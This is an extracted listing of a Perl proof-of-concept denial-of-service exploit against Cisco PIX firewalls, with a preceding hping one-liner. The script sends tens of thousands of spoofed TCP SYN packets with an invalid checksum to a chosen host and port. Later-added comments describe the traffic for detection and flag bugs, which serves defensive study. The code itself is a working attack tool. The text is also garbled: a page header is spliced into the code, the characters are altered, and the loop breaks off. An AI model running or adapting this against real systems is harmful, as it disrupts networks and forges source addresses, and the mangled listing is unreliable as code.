1 # The easy way by logic logidev@gmail.com (line 2) untested /str0ke
2 # hping −c 1 −S −s 31337 −k −b −p 22 10.0.xx.xxx
3
4 #!/usr/bin/perl
# Start of a proof-of-concept script; the page header embedded in this listing
# names it "Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service
# Exploit". This part checks that the required modules load, prints a banner
# and reads the command line.
#
# For defenders, the traffic the visible send loop produces is: TCP SYN
# segments between one fixed source/destination address pair, to one
# destination port, with the source port taken from a counter that increases
# by one per packet, and with the TCP checksum field set to the constant
# 0x0010. Because the source port changes while the checksum does not, the
# checksum can be correct for very few of these packets at most.
# NOTE(review): presumably the invalid checksum is what the target
# mishandles; the page does not say so -- confirm against the vendor advisory.
#
# Each module is pulled in through a string eval so that a missing module ends
# the run with a readable message.
5 eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
6 eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
7 eval ("use Term::ProgressBar;");
8 die "[error] Term::ProgressBar perl module is not installed \n" if $@;
9 my $VERSION = "0.1";
# $PgmName is not assigned anywhere in the visible code, so the banner shows
# an empty program name. The script has no "use strict" / "use warnings".
10 print "$0, $PgmName, V $VERSION \n";
# Option values land in undeclared package globals. The return value of
# GetOptions is not checked and none of the values is validated here.
# --source is later used as the IP source address of every packet, so the
# sender chooses it freely; that is the "spoofed" part of the title. Filtering
# spoofed source addresses at the network edge (ingress / reverse-path
# filtering) limits where such packets can come from.
11 GetOptions (
12 "help" =>\$usage,
13 "device=s" => \$device,
14 "source=s" =>\$sourceip,
15 "dest=s"=>\$destip,
16 "sourcemac=s"=>\$sourcemac,
17 "destmac=s"=>\$destmac,
18 "port=n"=> \$tcpport,
19 );
20
21 ######################## Config option ####################
22
# Value handed unchanged to ethsend() in the send loop. It is a string that
# contains a comma; how Net::RawIP interprets it is not shown in this file.
23 my $timeout = "0,1"; # Timeout
24
# usage() is not defined in the visible part of the file.
# NOTE(review): if it returns instead of exiting, the checks below fall
# through and the script carries on with missing values -- confirm.
25 if ($usage) {&usage;}
26
# The interface name falls back to a fixed default when --device is absent.
27 if (!$device) {
28 $device= ’eth0’; # Network device
29 }
30
# Required arguments. --sourcemac is not checked here; it is optional and is
# handled when the Ethernet header is set up.
# These are truth tests, so a value of 0 (for example --port 0) is reported as
# "not found".
31 if (!$destmac) {print "Dest MAC not found \n"; &usage;}
32 if (!$sourceip) {print "Source IP not found \n"; &usage;}
33 if (!$destip) {print "Dest IP not found \n"; &usage;}
34 if (!$tcpport) {print "TCP port not found \n"; &usage;}
35
# Flag and payload the send loop puts into every packet. For detection: a SYN
# segment that carries data is generally uncommon in ordinary traffic, and
# here it is always the same 4-byte payload.
36 my $syn="1"; # TCP SYN SET
37 my $tcpdata = "TEST"; # TCP payload
# Loop counter; the send loop also uses it as the TCP source port.
38 my $count=0;
39
40 ######################################################
41
42 #Initialize Progres Bar
# Progress display.
# NOTE(review): the bar is created for 32768 steps while the send loop counts
# up to 65536, and no update call appears in the visible part of the file.
43 my $progress = Term::ProgressBar−>new(32768);
44 $progress−>minor(0);
# Packet object, created with indirect-object syntax and stored in an
# undeclared package global.
45 $packet = new Net::RawIP;
# Prepares link-layer (Ethernet) sending on the chosen interface.
# NOTE(review): raw frame injection normally requires elevated privileges on
# the sending host -- confirm for the platform in use.
46 $packet−> ethnew($device);
47
48
# The destination MAC always comes from --destmac. The source MAC is only
# overridden when --sourcemac was supplied; otherwise it is left unset here.
# The closing brace of the else branch follows the page header that the
# extraction embedded in the listing.
49 if (!$sourcemac) {
50 $packet −> ethset( dest => $destmac);
51 }else {
52 $packet −> ethset( source =>$sourcemac, dest => $destmac);
Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit
Janis Vizulis
11/23/2005
53 }
54
55
56
57 for ($count=0; $count< 65537 ; $count++) {
58
59 $packet−>set({
60
61 ip => {
62 saddr => $sourceip,
63 daddr => $destip
64 },
65
66 tcp => {
67 check => 0x0010 , # TCP Packet Checksum 0 for auto correct
68 source => $count,
69 dest => $tcpport,
70 syn => $syn,
71 data => $tcpdata
72 }});
73 $packet−>ethsend($timeout);
74 #$packet−>s